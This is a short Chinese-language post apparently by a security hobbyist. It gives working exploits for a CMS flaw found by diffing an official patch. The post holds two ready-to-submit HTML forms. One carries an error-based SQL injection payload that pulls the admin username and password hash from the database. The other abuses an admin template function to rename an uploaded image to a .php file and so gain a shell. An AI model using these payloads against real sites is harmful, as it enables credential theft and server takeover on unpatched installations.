起因,许诺说他的网站被人黑了,大半夜的叫我来分析下搞个exp给他,官方已经出了补丁,网上还没有exp。对比了下补丁漏洞出现在datacall_class.php文件,有兴趣的朋友自己跟一下。
注入:
1 2 3 4 5 6
| <form action="http://www.php0day.com/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall" method="post"> <input type="text" name="datacallname" value="涓婚_鐩稿叧涓婚" size="80"> <input type="hidden" name="sid" value="1/**/AND/**/(select/**/1/**/from/**/(select count(*),concat((SELECT concat(adminname,0x7c,password) FROM modoer_admin limit 0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)#" /> <input type="hidden" name="name" value="b4dboy" /> <input type="submit" value="exp" /> </form>
|
注:上面的datacallname值不是乱码,是编码过的。再附一个自己发现的后台文件重命名拿shell。
1 2 3 4 5 6
| <form method="post" action="http://www.php0day.com/admin.php?module=&act=template&op=update"> path:<input type="text" name="root_dir" value="uploads/bcastr/" size="40" /> filename:<input type="text" name="fielnames[1][filename]" value="78_1348754079.jpg" size="40" /> newfilename:<input type="text" name="fielnames[1][newfilename]" value="b4dboy.php" size="40" /> <input type="submit" name="dosubmit" value="exp" /> </form>
|